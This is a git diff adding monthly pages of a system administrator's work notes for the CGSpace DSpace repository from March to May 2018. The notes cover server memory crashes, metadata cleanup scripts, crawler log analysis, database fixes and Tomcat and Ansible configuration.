  • Atmire got back to me about the Listings and Reports issue and said it’s caused by items that have missing dc.identifier.citation fields
  • +
  • They will send a fix
  • +
+

2018-03-27

+
    +
  • Atmire got back with an updated quote about the DSpace 5.8 compatibility so I’ve forwarded it to Peter
  • +
+

2018-03-28

+
    +
  • DSpace Test crashed due to heap space so I’ve increased it from 4096m to 5120m
  • +
  • The error in Tomcat’s catalina.out was:
  • +
+
Exception in thread "RMI TCP Connection(idle)" java.lang.OutOfMemoryError: Java heap space
+
    +
  • Add ISI Journal (cg.isijournal) as an option in Atmire’s Listing and Reports layout (#370) for Abenet
  • +
  • I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:
  • +
+
$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
+Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
+Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
+Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
+Fixed 100 occurences of: ROOTS, TUBERS AND BANANAS
+Fixed 31 occurences of: HUMIDTROPICS
+Fixed 21 occurences of: MAIZE
+Fixed 11 occurences of: POLICIES, INSTITUTIONS, AND MARKETS
+Fixed 28 occurences of: GRAIN LEGUMES
+Fixed 3 occurences of: FORESTS, TREES AND AGROFORESTRY
+Fixed 5 occurences of: GENEBANKS
+
    +
  • That’s weird because we just updated them last week…
  • +
  • Create a pull request to enable searching by ORCID identifier (cg.creator.id) in Discovery and Listings and Reports (#371)
  • +
  • I will test it on DSpace Test first!
  • +
  • Fix one missing XMLUI string for “Access Status” (cg.identifier.status)
  • +
  • Run all system updates on DSpace Test and reboot the machine
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2018-04/index.html b/docs/2018-04/index.html new file mode 100644 index 000000000..0af82af5f --- /dev/null +++ b/docs/2018-04/index.html @@ -0,0 +1,648 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + April, 2018 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

April, 2018

+ +
+

2018-04-01

+
    +
  • I tried to test something on DSpace Test but noticed that it’s been down since god knows when
  • +
  • Catalina logs at least show some memory errors yesterday:
  • +
+
Mar 31, 2018 10:26:42 PM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
+SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]] 
+java.lang.OutOfMemoryError: Java heap space
+
+Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]" java.lang.OutOfMemoryError: Java heap space
+
    +
  • So this is getting super annoying
  • +
  • I ran all system updates on DSpace Test and rebooted it
  • +
  • For some reason Listings and Reports is not giving any results for any queries now…
  • +
  • I posted a message on Yammer to ask if people are using the Duplicate Check step from the Metadata Quality Module
  • +
  • Help Lili Szilagyi with a question about statistics on some CCAFS items
  • +
+

2018-04-04

+
    +
  • Peter noticed that there were still some old CRP names on CGSpace, because I hadn’t forced the Discovery index to be updated after I fixed the others last week
  • +
  • For completeness I re-ran the CRP corrections on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
+Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
+
    +
  • Then started a full Discovery index:
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    76m13.841s
+user    8m22.960s
+sys     2m2.498s
+
    +
  • Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme’s items
  • +
  • I used my add-orcid-identifiers-csv.py script:
  • +
+
$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • The CSV format of jtohme-2018-04-04.csv was:
  • +
+
dc.contributor.author,cg.creator.id
+"Tohme, Joseph M.",Joe Tohme: 0000-0003-2765-7101
+
    +
  • There was a quoting error in my CRP CSV and the replacements for Forests, Trees and Agroforestry got messed up
  • +
  • So I fixed them and had to re-index again!
  • +
  • I started preparing the git branch for the DSpace 5.5→5.8 upgrade:
  • +
+
$ git checkout -b 5_x-dspace-5.8 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.8
+
    +
  • I was prepared to skip some commits that I had cherry picked from the upstream dspace-5_x branch when we did the DSpace 5.5 upgrade (see notes on 2016-10-19 and 2017-12-17): +
      +
    • [DS-3246] Improve cleanup in recyclable components (upstream commit on dspace-5_x: 9f0f5940e7921765c6a22e85337331656b18a403)
    • +
    • [DS-3250] applying patch provided by Atmire (upstream commit on dspace-5_x: c6fda557f731dbc200d7d58b8b61563f86fe6d06)
    • +
    • bump up to latest minor pdfbox version (upstream commit on dspace-5_x: b5330b78153b2052ed3dc2fd65917ccdbfcc0439)
    • +
    • DS-3583 Usage of correct Collection Array (#1731) (upstream commit on dspace-5_x: c8f62e6f496fa86846bfa6bcf2d16811087d9761)
    • +
    +
  • +
  • … but somehow git knew, and didn’t include them in my interactive rebase! (see the note at the end of this list)
  • +
  • I need to send this branch to Atmire and also arrange payment (see ticket #560 in their tracker)
  • +
  • Fix Sisay’s SSH access to the new DSpace Test server (linode19)
  • +
+
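  • (Presumably rebase drops commits whose patches already exist upstream; git cherry against the upstream branch would confirm which ones, something like:)
$ git cherry -v dspace-5.8 5_x-prod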

2018-04-05

+
    +
  • Fix Sisay’s sudo access on the new DSpace Test server (linode19)
  • +
  • The reindexing process on DSpace Test took forever yesterday:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    599m32.961s
+user    9m3.947s
+sys     2m52.585s
+
    +
  • So we really should not use this Linode block storage for Solr
  • +
  • Assetstore might be fine but would complicate things with configuration and deployment (ughhh)
  • +
  • Better to use Linode block storage only for backup
  • +
  • Help Peter with the GDPR compliance / reporting form for CGSpace
  • +
  • DSpace Test crashed due to memory issues again:
  • +
+
# grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
+16
+
    +
  • I ran all system updates on DSpace Test and rebooted it
  • +
  • Proof some records on DSpace Test for Udana from IWMI
  • +
  • He has done better with the small syntax and consistency issues, but there are larger concerns like not linking to DOIs, copying titles incorrectly, etc
  • +
+

2018-04-10

+
    +
  • I got a notice that CGSpace CPU usage was very high this morning
  • +
  • Looking at the nginx logs, here are the top users today so far:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                   
+    282 207.46.13.112
+    286 54.175.208.220
+    287 207.46.13.113
+    298 66.249.66.153
+    322 207.46.13.114
+    780 104.196.152.243
+   3994 178.154.200.38
+   4295 70.32.83.92
+   4388 95.108.181.88
+   7653 45.5.186.2
+
    +
  • 45.5.186.2 is of course CIAT
  • +
  • 95.108.181.88 appears to be Yandex:
  • +
+
95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] "GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
+
    +
  • And for some reason Yandex created a lot of Tomcat sessions today:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
+4363
+
    +
  • 70.32.83.92 appears to be some harvester we’ve seen before, but on a new IP
  • +
  • They are not creating new Tomcat sessions so there is no problem there
  • +
  • 178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
+3982
+
    +
  • I’m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve
  • +
  • Let’s try a manual request with and without their user agent:
  • +
+
$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
+GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2638
+Content-Type: image/jpeg;charset=ISO-8859-1
+Date: Tue, 10 Apr 2018 05:18:37 GMT
+Expires: Tue, 10 Apr 2018 06:18:37 GMT
+Last-Modified: Tue, 25 Apr 2017 07:05:54 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+
+$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg                                                                              
+GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: HTTPie/0.9.9
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2638
+Content-Type: image/jpeg;charset=ISO-8859-1
+Date: Tue, 10 Apr 2018 05:20:08 GMT
+Expires: Tue, 10 Apr 2018 06:20:08 GMT
+Last-Modified: Tue, 25 Apr 2017 07:05:54 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=31635DB42B66D6A4208CFCC96DD96875; Path=/; Secure; HttpOnly
+Strict-Transport-Security: max-age=15768000
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+
    +
  • So it definitely looks like Yandex requests are getting assigned a session from the Crawler Session Manager valve
  • +
  • And if I look at the DSpace log I see its IP sharing a session with other crawlers like Google (66.249.66.153)
  • +
  • Indeed the number of Tomcat sessions appears to be normal:
  • +
+

Tomcat sessions week

+
    +
  • In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2018"
+2266594
+
+real    0m13.658s
+user    0m16.533s
+sys     0m1.087s
+
    +
  • In other other news, the database cleanup script has an issue again:
  • +
+
$ dspace cleanup -v
+...
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(151626) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
+UPDATE 1
+
    +
  • Looking at abandoned connections in Tomcat:
  • +
+
# zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
+2115
+
    +
  • Apparently from these stacktraces we should be able to see which code is not closing connections properly
  • +
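  • A rough sketch of pulling the DSpace frames out of those stacktraces (assuming logAbandoned is enabled so the traces actually end up in catalina.out):
+
$ zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -A 20 'ConnectionPool abandon' | grep -o 'org\.dspace\.[a-zA-Z0-9_.]*' | sort | uniq -c | sort -n | tail
+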
  • Here’s a pretty good overview of days where we had database issues recently:
  • +
+
# zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
+      1 Feb 18, 2018
+      1 Feb 19, 2018
+      1 Feb 20, 2018
+      1 Feb 24, 2018
+      2 Feb 13, 2018
+      3 Feb 17, 2018
+      5 Feb 16, 2018
+      5 Feb 23, 2018
+      5 Feb 27, 2018
+      6 Feb 25, 2018
+     40 Feb 14, 2018
+     63 Feb 28, 2018
+    154 Mar 19, 2018
+    202 Feb 21, 2018
+    264 Feb 26, 2018
+    268 Mar 21, 2018
+    524 Feb 22, 2018
+    570 Feb 15, 2018
+
    +
  • In Tomcat 8.5 the removeAbandoned property has been split into two: removeAbandonedOnBorrow and removeAbandonedOnMaintenance
  • +
  • See: https://tomcat.apache.org/tomcat-8.5-doc/jndi-datasource-examples-howto.html#Database_Connection_Pool_(DBCP_2)_Configurations
  • +
  • I assume we want removeAbandonedOnBorrow and make updates to the Tomcat 8 templates in Ansible
  • +
  • After reading more documentation I see that Tomcat 8.5’s default DBCP seems to now be Commons DBCP2 instead of Tomcat DBCP
  • +
  • It can be overridden in Tomcat’s server.xml by setting factory="org.apache.tomcat.jdbc.pool.DataSourceFactory" in the <Resource>
  • +
  • I think we should use this default, so we’ll need to remove some other settings that are specific to Tomcat’s DBCP like jdbcInterceptors and abandonWhenPercentageFull
  • +
  • Merge the changes adding ORCID identifier to advanced search and Atmire Listings and Reports (#371)
  • +
  • Fix one more issue of missing XMLUI strings (for CRP subject when clicking “view more” in the Discovery sidebar)
  • +
  • I told Udana to fix the citation and abstract of the one item, and to correct the dc.language.iso for the five Spanish items in his Book Chapters collection
  • +
  • Then we can import the records to CGSpace
  • +
+

2018-04-11

+
    +
  • DSpace Test (linode19) crashed again some time since yesterday:
  • +
+
# grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
+168
+
    +
  • I ran all system updates and rebooted the server
  • +
+

2018-04-12

+ +

2018-04-13

+
    +
  • Add PII-LAM_CSAGender to CCAFS Phase II project tags in input-forms.xml
  • +
+

2018-04-15

+
    +
  • While testing an XMLUI patch for DS-3883 I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:
  • +
+
2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check "solr.authority.server" property in the dspace.cfg
+java.lang.NullPointerException
+
    +
  • I assume we need to remove authority from the consumers in dspace/config/dspace.cfg:
  • +
+
event.dispatcher.default.consumers = authority, versioning, discovery, eperson, harvester, statistics,batchedit, versioningmqm
+
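  • Something like this should remove it (a sketch; the path is relative to the source tree):
+
$ sed -i 's/consumers = authority, /consumers = /' dspace/config/dspace.cfg
+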
    +
  • I see the same error on DSpace Test so this is definitely a problem
  • +
  • After disabling the authority consumer I no longer see the error
  • +
  • I merged a pull request to the 5_x-prod branch to clean that up (#372)
  • +
  • File a ticket on DSpace’s Jira for the target="_blank" security and performance issue (DS-3891)
  • +
  • I re-deployed DSpace Test (linode19) and was surprised by how long it took the ant update to complete:
  • +
+
BUILD SUCCESSFUL
+Total time: 4 minutes 12 seconds
+
    +
  • The Linode block storage is much slower than the instance storage
  • +
  • I ran all system updates and rebooted DSpace Test (linode19)
  • +
+

2018-04-16

+
    +
  • Communicate with Bioversity about their project to migrate their e-Library (Typo3) and Sci-lit databases to CGSpace
  • +
+

2018-04-18

+
    +
  • IWMI asked about getting an OpenSearch feed of their community sorted by date; the available sort options are defined in dspace.cfg:
  • +
+
webui.itemlist.sort-option.1 = title:dc.title:title
+webui.itemlist.sort-option.2 = dateissued:dc.date.issued:date
+webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
+webui.itemlist.sort-option.4 = type:dc.type:text
+
    +
  • They want items by issue date, so we need to use sort option 2
  • +
  • According to the DSpace Manual there are only the following parameters to OpenSearch: format, scope, rpp, start, and sort_by
  • +
  • The OpenSearch query parameter expects a Discovery search filter that is defined in dspace/config/spring/api/discovery.xml
  • +
  • So for IWMI they should be able to use something like this: https://cgspace.cgiar.org/open-search/discover?query=dateIssued:2018&scope=10568/16814&sort_by=2&order=DESC&format=rss
  • +
  • There are also rpp (results per page) and start parameters but in my testing now on DSpace 5.5 they behave very strangely
  • +
  • For example, set rpp=1 and then check the results for start values of 0, 1, and 2 and they are all the same!
  • +
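  • A quick way to reproduce that with httpie (sketch; grepping the titles is just to eyeball whether the results change):
+
$ for start in 0 1 2; do http "https://cgspace.cgiar.org/open-search/discover?query=dateIssued:2018&scope=10568/16814&rpp=1&start=$start&format=rss" | grep -oE '<title>[^<]*</title>' | head -n 3; done
+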
  • If I have time I will check if this behavior persists on DSpace 6.x on the official DSpace demo and file a bug
  • +
  • Also, the DSpace Manual as of 5.x has very poor documentation for OpenSearch
  • +
  • They don’t tell you to use Discovery search filters in the query (with format query=dateIssued:2018)
  • +
  • They don’t tell you that the sort options are actually defined in dspace.cfg (ie, you need to use 2 instead of dc.date.issued_dt)
  • +
  • They are missing the order parameter (ASC vs DESC)
  • +
  • I notice that DSpace Test has crashed again, due to memory:
  • +
+
# grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
+178
+
    +
  • I will increase the JVM heap size from 5120M to 6144M, though we don’t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace
  • +
  • Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats
  • +
  • I got a list of all the CIP collections manually and used the same query that I used in August, 2017:
  • +
+
dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
+

2018-04-19

+
    +
  • Run updates on DSpace Test (linode19) and reboot the server
  • +
  • Also try deploying updated GeoLite database during ant update while re-deploying code:
  • +
+
$ ant update update_geolite clean_backups
+
    +
  • I also re-deployed CGSpace (linode18) to make the ORCID search, authority cleanup, CCAFS project tag PII-LAM_CSAGender live
  • +
  • When re-deploying I also updated the GeoLite databases so I hope the country stats become more accurate…
  • +
  • After re-deployment I ran all system updates on the server and rebooted it
  • +
  • After the reboot I forced a reïndexing of the Discovery to populate the new ORCID index:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    73m42.635s
+user    8m15.885s
+sys     2m2.687s
+
    +
  • This time is with about 70,000 items in the repository
  • +
+

2018-04-20

+
    +
  • Gabriela from CIP emailed to say that CGSpace was returning a white page, but I haven’t seen any emails from UptimeRobot
  • +
  • I confirm that it’s just giving a white page around 4:16
  • +
  • The DSpace logs show that there are no database connections:
  • +
+
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-715] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle:0; lastwait:5000].
+
    +
  • And there have been shit tons of errors in the log (starting only 20 minutes ago, luckily):
  • +
+
# grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
+32147
+
    +
  • I can’t even log into PostgreSQL as the postgres user, WTF?
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c 
+^C
+
    +
  • Here are the most active IPs today:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    917 207.46.13.182
+    935 213.55.99.121
+    970 40.77.167.134
+    978 207.46.13.80
+   1422 66.249.64.155
+   1577 50.116.102.77
+   2456 95.108.181.88
+   3216 104.196.152.243
+   4325 70.32.83.92
+  10718 45.5.184.2
+
    +
  • It doesn’t even seem like there is a lot of traffic compared to the previous days:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | wc -l
+74931
+# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E "19/Apr/2018" | wc -l
+91073
+# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E "18/Apr/2018" | wc -l
+93459
+
    +
  • I tried to restart Tomcat but systemctl hangs
  • +
  • I tried to reboot the server from the command line but after a few minutes it didn’t come back up
  • +
  • Looking at the Linode console I see that it is stuck trying to shut down
  • +
  • Even “Reboot” via Linode console doesn’t work!
  • +
  • After shutting it down a few times via the Linode console it finally rebooted
  • +
  • Everything is back but I have no idea what caused this—I suspect something with the hosting provider
  • +
  • Also super weird, the last entry in the DSpace log file is from 2018-04-20 16:35:09, and then immediately it goes to 2018-04-20 19:15:04 (three hours later!):
  • +
+
2018-04-20 16:35:09,144 ERROR org.dspace.app.util.AbstractDSpaceWebapp @ Failed to record shutdown in Webapp table.
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle
+:0; lastwait:5000].
+        at org.apache.tomcat.jdbc.pool.ConnectionPool.borrowConnection(ConnectionPool.java:685)
+        at org.apache.tomcat.jdbc.pool.ConnectionPool.getConnection(ConnectionPool.java:187)
+        at org.apache.tomcat.jdbc.pool.DataSourceProxy.getConnection(DataSourceProxy.java:128)
+        at org.dspace.storage.rdbms.DatabaseManager.getConnection(DatabaseManager.java:632)
+        at org.dspace.core.Context.init(Context.java:121)
+        at org.dspace.core.Context.<init>(Context.java:95)
+        at org.dspace.app.util.AbstractDSpaceWebapp.deregister(AbstractDSpaceWebapp.java:97)
+        at org.dspace.app.util.DSpaceContextListener.contextDestroyed(DSpaceContextListener.java:146)
+        at org.apache.catalina.core.StandardContext.listenerStop(StandardContext.java:5115)
+        at org.apache.catalina.core.StandardContext.stopInternal(StandardContext.java:5779)
+        at org.apache.catalina.util.LifecycleBase.stop(LifecycleBase.java:224)
+        at org.apache.catalina.core.ContainerBase$StopChild.call(ContainerBase.java:1588)
+        at org.apache.catalina.core.ContainerBase$StopChild.call(ContainerBase.java:1577)
+        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at java.lang.Thread.run(Thread.java:748)
+2018-04-20 19:15:04,006 INFO  org.dspace.core.ConfigurationManager @ Loading from classloader: file:/home/cgspace.cgiar.org/config/dspace.cfg
+
    +
  • Very suspect!
  • +
+

2018-04-24

+
    +
  • Testing my Ansible playbooks with a clean and updated installation of Ubuntu 18.04 and I fixed some issues that I hadn’t run into a few weeks ago
  • +
  • There seems to be a new issue with Java dependencies, though
  • +
  • The default-jre package is going to be Java 10 on Ubuntu 18.04, but I want to use openjdk-8-jre-headless (well, the JDK actually, but it uses this JRE)
  • +
  • Tomcat and Ant are fine with Java 8, but the maven package wants to pull in Java 10 for some reason
  • +
  • Looking closer, I see that maven depends on java7-runtime-headless, which is indeed provided by openjdk-8-jre-headless
  • +
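  • Something like this shows the dependency chain (sketch):
+
$ apt-cache depends maven
$ apt-cache showpkg java7-runtime-headless
# the "Reverse Provides" section should list the packages that provide it
+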
  • So it must be one of Maven’s dependencies…
  • +
  • I will watch it for a few days because it could be an issue that will be resolved before Ubuntu 18.04’s release
  • +
  • Otherwise I will post a bug to the ubuntu-release mailing list
  • +
  • Looks like the only way to fix this is to install openjdk-8-jdk-headless first (so it pulls in the JRE) in a separate transaction, or to manually install openjdk-8-jre-headless in the same apt transaction as maven
  • +
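  • In other words, one of these two (sketch):
+
# separate transactions: the JDK first, then maven
$ sudo apt install openjdk-8-jdk-headless
$ sudo apt install maven
# ...or explicitly pull the JRE in the same transaction as maven
$ sudo apt install openjdk-8-jre-headless maven
+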
  • Also, I started porting PostgreSQL 9.6 into the Ansible infrastructure scripts
  • +
  • This should be a drop-in replacement, I believe, though I will definitely test it more locally as well as on DSpace Test once we move to DSpace 5.8 and Ubuntu 18.04 in the coming months
  • +
+

2018-04-25

+
    +
  • Still testing the Ansible infrastructure playbooks for Ubuntu 18.04, Tomcat 8.5, and PostgreSQL 9.6
  • +
  • One other new thing I notice is that PostgreSQL 9.6 no longer uses createuser and nocreateuser, as those have actually meant superuser and nosuperuser and have been deprecated for ten years
  • +
  • So I need to amend my notes: when I’m importing a CGSpace database dump I have to give the user superuser permission, rather than createuser:
  • +
+
$ psql dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
+
    +
  • There’s another issue with Tomcat in Ubuntu 18.04:
  • +
+
25-Apr-2018 13:26:21.493 SEVERE [http-nio-127.0.0.1-8443-exec-1] org.apache.coyote.AbstractProtocol$ConnectionHandler.process Error reading request, ignored
+ java.lang.NoSuchMethodError: java.nio.ByteBuffer.position(I)Ljava/nio/ByteBuffer;
+        at org.apache.coyote.http11.Http11InputBuffer.init(Http11InputBuffer.java:688)
+        at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:672)
+        at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
+        at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:790)
+        at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1459)
+        at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+        at java.lang.Thread.run(Thread.java:748)
+
+

2018-04-29

+
    +
  • DSpace Test crashed again, looks like memory issues again
  • +
  • JVM heap size was last increased to 6144m but the system only has 8GB total so there’s not much we can do here other than get a bigger Linode instance or remove the massive Solr Statistics data
  • +
+

2018-04-30

+
    +
  • DSpace Test crashed again
  • +
  • I will email the CGSpace team to ask them whether or not we want to commit to having a public test server that accurately mirrors CGSpace (ie, to upgrade to the next largest Linode)
  • +
diff --git a/docs/2018-05/index.html b/docs/2018-05/index.html new file mode 100644 index 000000000..ffc59e338 --- /dev/null +++ b/docs/2018-05/index.html @@ -0,0 +1,577 @@

May, 2018

+ +
+

2018-05-01

+
    +
  • I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface: +
      +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E
    • +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
    • +
    +
  • +
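  • The same thing from the command line would be something like this with curl (assuming the same tunneled port):
+
$ curl "http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E"
$ curl "http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E"
+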
  • Then I reduced the JVM heap size from 6144 back to 5120m
  • +
  • Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
  • +
+

2018-05-02

+
    +
  • Advise Fabio Fidanza about integrating CGSpace content in the new CGIAR corporate website
  • +
  • I think they can mostly rely on using the cg.contributor.crp field
  • +
  • Looking over some IITA records for Sisay +
      +
    • Other than trimming and collapsing consecutive whitespace, I made some other corrections
    • +
    • I need to check the correct formatting of COTE D'IVOIRE vs COTE D’IVOIRE (straight apostrophe vs the Unicode smart quote, hex 2019)
    • +
    • I replaced all DOIs with HTTPS
    • +
    • I checked a few DOIs and found at least one that was missing, so I Googled the title of the paper and found the correct DOI
    • +
    • Also, I found an FAQ for DOI that says the dx.doi.org syntax is older, so I will replace all the DOIs with doi.org instead
    • +
    • I found five records with “ISI Jounal” instead of “ISI Journal”
    • +
    • I found one item with IITA subject “.”
    • +
    • Need to remember to check the facets for things like this in sponsorship: +
        +
      • Deutsche Gesellschaft für Internationale Zusammenarbeit
      • +
      • Deutsche Gesellschaft fur Internationale Zusammenarbeit
      • +
      +
    • +
    • Eight records with language “fn” instead of “fr”
    • +
    • One incorrect type (lowercase “proceedings”): Conference proceedings
    • +
    • Found some capitalized CRPs in cg.contributor.crp
    • +
    • Found some incorrect author affiliations, ie “Institut de Recherche pour le Developpement Agricolc” should be “Institut de Recherche pour le Developpement Agricole
    • +
    • Wow, and for sponsors there are the following: +
        +
      • Incorrect: Flemish Agency for Development Cooperation and Technical Assistance
      • +
      • Incorrect: Flemish Organization for Development Cooperation and Technical Assistance
      • +
      • Correct: Flemish Association for Development Cooperation and Technical Assistance
      • +
      +
    • +
    • One item had region “WEST” (I corrected it to “WEST AFRICA”)
    • +
    +
  • +
+

2018-05-03

+
    +
  • It turns out that the IITA records that I was helping Sisay with in March were imported in 2018-04 without a final check by Abenet or me
  • +
  • There are lots of errors on language, CRP, and even some encoding errors on abstract fields
  • +
  • I export them and include the hidden metadata fields like dc.date.accessioned so I can filter the ones from 2018-04 and correct them in Open Refine:
  • +
+
$ dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
+
    +
  • Abenet sent a list of 46 ORCID identifiers for ILRI authors so I need to get their names using my resolve-orcids.py script and merge them into our controlled vocabulary
  • +
